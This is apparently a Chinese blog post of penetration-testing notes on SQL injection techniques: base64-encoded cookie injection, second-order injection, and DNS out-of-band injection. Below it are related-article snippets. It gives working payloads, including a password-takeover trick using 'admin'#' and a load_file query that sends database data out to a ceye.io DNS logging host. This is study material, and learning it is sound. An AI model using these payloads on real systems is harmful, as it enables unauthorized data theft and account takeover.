WEB漏洞-SQL注入二次,加解密,dns注入

已于 2022-01-26 10:41:08 修改
阅读量1k 收藏 1
点赞数
分类专栏: 渗透笔记2 文章标签: sql 数据库 安全
于 2022-01-15 20:34:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhscxj/article/details/122408195
版权

加解密
在这里插入图片描述
此处Cookie中的uname的参数值为base64加密的密文,所以在尝试注入的时候,要把注入语句也进行加密

二次注入
当网站有类似注册修改等功能时有可能产生,只能白盒测试

例:当用户注册了一个用户名为admin’ and 1=1–+类似的语句,在注册时sql语句进行了单引号过滤,没有报错,写入数据库中。但当用户想修改用户名时,修改的sql语句update没有进行过滤,导致单引号闭合。就会产生注入
在这里插入图片描述
当数据库中有一个admin用户,我注册一个admin’#用户。我通过修改admin’#的密码可以把用户admin密码修改。

原理:
当注册的sql语句进行过滤,但修改的sql语句没有进行过滤时产生

修改的sql语句:

update user set pwd='$pwd' where username='$username'

填入参数后

update user set pwd='123456' where username='admin'#'

因为#把后面的’注释掉了,所以就变成修改用户名为admin的用户的密码了。如果在url上进行了对id的过滤,并通过GET传过来的id改,就不会发生

DNSLOG带外注入
dnslog要有高权限,具有文件读写的权限才能进行
需要登陆CEYE平台
在这里插入图片描述
注入语句:

id =1 and if((select load_file(concat('\\\\',(select version()),'.yps772.ceye.io\\abc'))),1,0

(简单理解就是将查询出来的东西发送到这个CEYE上)

load_file函数可以进行对外的读取。
因为自己写入的是一个dns地址,当select语句查询出当前版本号后,就会尝试对dns地址进行访问,然后CYEC就会记录下访问的信息。从而爆出版本号
在这里插入图片描述
在这里插入图片描述
DNSLOG(主要解决盲注不能回显或回显效率低的问题)
也可以用工具去尝试
此工具需要安装python运行环境
修改config.py:
把APItoken和DNSurl修改为自己的
在这里插入图片描述
然后通过python来运行
在这里插入图片描述
如果注入网址是字符型就手动在上面加上闭合语句,如果是数字型就不用加。(网址需要加双引号)
在这里插入图片描述
加解密

加解密注入的时候可以自己写脚本,通过sqlmap注入
在这里插入图片描述
在这里插入图片描述
实现了一个中转,sqlmap在后面写入注入代码,通过GET参数去访问本地网页,然后本地网页把sqlmap提交的GET参数的内容进行base64加密,并且在目标网址后面进行拼接。从而达到非手工base64注入

深白色耳机
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者mysql注入_墨者靶场:SQL注入漏洞测试(参数加密) 使用sqlmap进行注入
weixin_30695935的博客
01-19 1240
墨者靶场:SQL注入漏洞测试(参数加密) 使用sqlmap进行注入前言首先这是一个很基础的题,实战中也会遇到。比如说前端利用JavaScript公钥加密并传输给后端,后端通过私钥进行解密执行。这样做的好处就在于可以有效的避免了中间人攻击。跟SSL原理差不多 只是SSL在传输层做的 这种加密在应用层做的。我从来不写百度能查到的writeup,因为这种行为是无意义的。要写就写一些干货。这才是文章的价值...
SQL注入DnsLog注入
qq_52310755的博客
03-22 1950
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
06_SQL注入_二次注入&加密解密
qq_42171569的博客
05-18 1066
06_SQL注入_加密注入&二次注入 1.加密注入 SQL注入的思路是用户用自定义语句和原本的SQL语句拼接,但有时开发者会对获取到的数据进行加密,那么对于渗透测试者而言如果想要在这样的情况下进行操作,则需要将自己的注入语句进行相同的加密处理后与原本的语句进行拼接。这种类型的大体思路和先前的思路整体无异,唯一的区别就是需要测试者先写好payload,再进行加密,随后将数据包放出进行注入尝试。 加密类型的注入SQLi-Labs中得到了复现,实验如下: 【靶场】SQLi-Labs less-21 【
17、SQL注入二次加解密DNS注入
最新发布
山兔的博客
07-15 393
sqlmap里面的tamper插件库,你如果说懂python,二次开发是没有问题的,或者我们自己去写个插件放在里面也可以直接去引用的,比如安全狗的,写个sqldog.py,那就是根据安全狗的绕过规则写个py文件到里面去,我们就可以根据sqlmap对目标进行工具上的注入并且绕过安全狗。在后续的渗透测试过程中,我们会发现,你即使后门传上去,不见得就会连上去,因为还会有各种各样的问题,但是这个问题出现的机率也不会很高,我们从后门传上去的脚本,它不解析,传到后门,它也无法连接。第二点,对方的加密形式;
SQL注入二次加解密DNS注入
m0_48907714的博客
04-02 4713
加解密二次DNSlog注入 加解密 实例 sqli-labs-master/Less-21/ 登录抓包 抓包结果 将uname的内容一看就是加密内容,我们进行解密,我们看解密结果 我们将%3D是ascii码的‘=’号,我们将其修改回来 这时我们需要进行cookie注入时就需要进行加密注入 uname=YWRtaW4ZIGFuZCAnMScgPScyJyAtLSs= 注入报错了,存在注入 sqlmap也存在base64的插件 sqlmap.py -u “http://127.0.0.1/sql
第27天:WEB攻防-通用漏洞&SQL注入&Tamper脚本&Base64&Json&md5等
wuqingsix的博客
11-19 514
不同payload类型的注入方式构造:字符型,搜索形 ,加密,编码形。宽字节的构造和绕过, sqlmap的tamper字典使用
第17天:WEB漏洞-SQL注入二次,加解密,DNS注入1
08-03
WEB 漏洞-二次,加解密,DNS注入#加解密二次DNSlog 注入注入原理,演示案例,实际应用(中转注入DNSlog:解决了盲注不能回显数据,效率低
java开源包11
06-28
nfs-rpc是一个集成了各种知名通信框架的高性能RPC框架,目前其最好的性能为在采用grizzly作为通信框架,采用pb作为序列化/反序列化时,tps为168k次/秒。 其支持的功能主要为: 1、透明的调用远端服务器提供的功能...
asp.net知识库
06-18
最详细的SQL注入相关的命令整理 Oracle Oracle中PL/SQL单行函数和组函数详解 mssql+oracle Oracle编程的编码规范及命名规则 Oracle数据库字典介绍 0RACLE的字段类型 事务 CMT DEMO(容器管理事务演示) 事务隔离性的...
java开源包1
06-28
nfs-rpc是一个集成了各种知名通信框架的高性能RPC框架,目前其最好的性能为在采用grizzly作为通信框架,采用pb作为序列化/反序列化时,tps为168k次/秒。 其支持的功能主要为: 1、透明的调用远端服务器提供的功能...
JAVA上百实例源码以及开源项目
01-03
Java图片加水印,支持旋转和透明度设置 摘要:Java源码,文件操作,图片水印  util实现Java图片水印添加功能,有添加图片水印和文字水印,可以设置水印位置,透明度、设置对线段锯齿状边缘处理、水印图片的路径,水印...
CTF 加密 解密 SQL注入 BASE64
03-19
CTF 加密 解密 SQL注入 BASE64
SQL注入之什么是加密注入|二次漏洞注入|DNSlog注入
向阳-Y.的博客
11-07 6928
加密注入二次漏洞注入DNSlog注入 加密注入: 什么是加密注入??下面将由一个例子阐述: 以sqlilabs-less-21为例 1.在登录界面输入账户密码提交抓包 2.在抓到这条数据,将umane的值进行base64解密: 解密结果为admin(注:%3D就是=号) 在admin的基础上进行修改,bb修改为: admin' or updatexml(1,concat(0x7e,(version())),0) or ' 以上代码为盲注中的报错注入(不懂的请点我) 再进行base64加密,加密结果为
SQL注入漏洞测试(参数加密)———视频全过程
渗透测试
09-08 362
SQL注入漏洞测试(参数加密) 解题思路: 进入界面>>>扫描后台目录>>>发现解密相关php文件>>>进行代码审计>>>推算出加密过程(略)>>>使用手工注入(略)>>>得到账户密码(MD5解密)>>>登陆后台>>>拿到key 得到代码后也可以使用sqlmap进行脚本自动注入 需要分局解密过程编写php加密过程 <?php ##加密过程 $id = b
SQL注入防御之参数加密
qq_39756628的博客
04-26 458
AES加密SQL参数靶场练习 资源路径: 墨者学院-在线靶场-数据库安全-SQL注入漏洞测试(参数加密) 技能要求: 信息泄露方式+AES加解密+PHP语法+手工SQL注入+mysql数据库结构 目标: 通过SQL注入方式,获取WEB业务系统的账号密码进行登录。 通关测试: 首先访问目标 使用AWVS先扫一遍:http://219.153.49.228:41606 使用浏览器访问扫描到的URL: http://219.153.49.228:41606/news/list.php?id=ZUlJOGMz
关于sql注入这一篇就够了(适合入门)
qq_53105813的博客
01-07 4916
sql注入详解
010202注入漏洞
TangTang_AM的博客
04-04 4302
2-1.SQL注入原理 2-2.Mysql注入有关知识点 2-3.SQLLab靶场搭建 2-4.GET基于报错的SQL注入 2-5.不再显示错误的盲注 2-6.Mysql注入读写文件 2-7.POST基于错误的注入 2-8.GET报错注入 2-9.SQL注入绕过手段 2-10.POST基于时间与布尔盲注 2-11.HTTP头中的SQL注入 2-12.POST_Upadte语句注入 2-13.Cookie注入 2-14.CookieBase64注入 2-15.绕过去除注释符的SQL
sqlmap跑base64加密
向阳-Y.的博客
03-26 918
将以下demo保存为test.php,然后自己搭建一个服务器 <?php $id = base64_encode("id=".$_GET['id']); echo file_get_contents("http://www.xxxx.com/project_detail.php?{$id}"); ?> sqlmap.py -u “http://127.0.0.1/test.php?id=12” -v3 --dbs 就可以跑出来了。 转载自: https://www.cnblogs.com/
websql注入二次加解密dns注入等(17)
san3144393495的博客
04-26 338
这个二次注入,和前面讲到那些注入有一些小的区别,而是产生的地方区别,从查询方式我们可以根据网站的应用功能判断他是何种查询方式,还有其他的,但是他们但是在注入的原则什么进行一些编译,比如说提交方式,查询方式,参数类型等一些的不同,但这个二次注入,有不同是无法通过扫描工具或代码自己手工去测试出来的,只能从网站源代码里面才能发现二次注入漏洞,从前端或黑盒测试是看不到这种漏洞的,有也找不到,这也是它的特点,传出来是什么东西啊,肯定有问题。常规注入的话,加解密就是多了一层按照他的加密方式去提交。这是注入扩展里面的,
SQL注入天书-ASP注入漏洞全接触.pdf
07-09
在《SQL注入天书-ASP注入漏洞全接触.pdf》中,作者详细介绍了SQL注入漏洞的原理、攻击方式和防御方法,旨在帮助开发人员和安全人员更好地理解和应对SQL注入漏洞。 本文从B/S模式应用开发的背景出发,指出了程序员在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值